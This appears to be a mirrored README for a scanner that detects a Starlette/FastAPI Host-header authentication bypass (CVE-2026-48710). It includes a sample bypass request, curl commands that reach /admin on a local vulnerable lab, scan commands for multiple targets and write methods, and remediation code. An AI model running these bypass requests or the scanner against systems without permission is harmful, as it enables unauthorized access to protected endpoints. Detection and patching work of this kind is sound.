Share
## https://sploitus.com/exploit?id=2BD05E53-56D6-5376-821B-9F1C5CF31FD0
# BadHost โ CVE-2026-48710 Scanner
Detection-only scanner for the **BadHost** auth-bypass in Starlette / FastAPI โ where auth middleware reads `request.url.path` instead of `request.scope["path"]`, allowing a crafted `Host` header to smuggle an allowlisted path and bypass authentication.
```
GET /admin HTTP/1.1
Host: api.internal/health?__badhost=
# Starlette sees request.url.path == "/health" โ allowed
# ASGI still routes to /admin โ bypassed
```
**Affected:** Starlette โค 0.46.1 / FastAPI โค 0.115.x
**Fixed in:** Starlette 0.46.2+
---
## Features
- Loads endpoints from a FastAPI/OpenAPI JSON or YAML spec (file or URL)
- Auto-discovers unauthenticated paths to use as injection candidates
- Tests both `Host` and `X-Forwarded-Host` carriers, two payload strategies
- Built-in presets for AI/LLM (`--preset ai`) and MCP (`--preset mcp`) endpoints
- Output: text summary, `--json`, `--csv`
- Live scan progress to stderr; zero third-party dependencies
---
## Local Vulnerable Lab (`badhost_vuln_lab/`)
Ships with two FastAPI apps for local validation:
| App | URL | Auth reads |
|-----|-----|-----------|
| Vulnerable | `http://127.0.0.1:8000` | `request.url.path` โ bypassed |
| Fixed | `http://127.0.0.1:8001` | `request.scope["path"]` โ safe |
```bash
cd badhost_vuln_lab
docker compose up --build
```
Or without Docker:
```bash
pip install -r badhost_vuln_lab/requirements.txt
uvicorn badhost_vuln_lab.app_vulnerable:app --host 127.0.0.1 --port 8000
uvicorn badhost_vuln_lab.app_fixed:app --host 127.0.0.1 --port 8001
```
### Manual bypass test
```bash
curl -i http://127.0.0.1:8000/admin # 403
curl -i -H "Host: 127.0.0.1:8000/health?x=" http://127.0.0.1:8000/admin # 200 โ bypassed
curl -i -H "Host: 127.0.0.1:8001/health?x=" http://127.0.0.1:8001/admin # 403 โ fixed
```
---
## Installation
```bash
git clone https://github.com/Bhanunamikaze/BadHost-CVE-2026-48710-Exploit.git
cd BadHost-CVE-2026-48710-Exploit
python badhost_openapi_scanner.py --help # Python 3.9+, no pip install needed
```
---
## Usage
```bash
# Read-only scan from local openapi.json
python badhost_openapi_scanner.py http://api.internal:8000 --openapi ./openapi.json
# Include write methods (staging/authorized only)
python badhost_openapi_scanner.py http://api.internal:8000 \
--openapi ./openapi.json --openapi-methods all \
--unsafe-allow-write --openapi-body-mode invalid
# Fetch OpenAPI directly from the target
python badhost_openapi_scanner.py http://api.internal:8000 \
--openapi http://api.internal:8000/openapi.json
# Multiple targets, CSV output
python badhost_openapi_scanner.py --targets-file targets.txt \
--openapi ./openapi.json --csv > results.csv
# AI/LLM + MCP preset paths (no OpenAPI needed)
python badhost_openapi_scanner.py http://api.internal:8000 --preset all
```
> `--openapi-body-mode invalid` sends `{}` for write methods โ triggers FastAPI `422` after auth bypass without executing the endpoint. A `baseline=403 test=422` result is still a **SUSPECT** finding worth investigating.
> Do **not** use `--openapi-body-mode minimal` on production โ it builds valid request bodies that may execute write endpoints.
---
## Verdicts
| Verdict | Meaning |
|---------|---------|
| `CONFIRMED` | Baseline 401/403 โ test 2xx. **Vulnerable.** |
| `SUSPECT` | Baseline 401/403 โ test 404/405/422. Auth gate appears bypassed; verify manually. `422` from FastAPI is especially significant. |
| `REJECTED` | Proxy rejected malformed Host (400/421) before bypass |
| `BLOCKED` | Crafted request still denied |
| `OPEN` | Already accessible without auth โ not this CVE |
Only `CONFIRMED` and `SUSPECT` appear in output. Exit code `2` = CONFIRMED, `1` = SUSPECT, `0` = clean.
---
## Remediation
```python
# Vulnerable
if request.url.path.startswith("/public"):
...
# Fixed
if request.scope["path"].startswith("/public"):
...
```
Upgrade to **Starlette 0.46.2+** / **FastAPI 0.116.0+**.
---
**For authorized testing only. Only scan systems you own or have explicit permission to test.**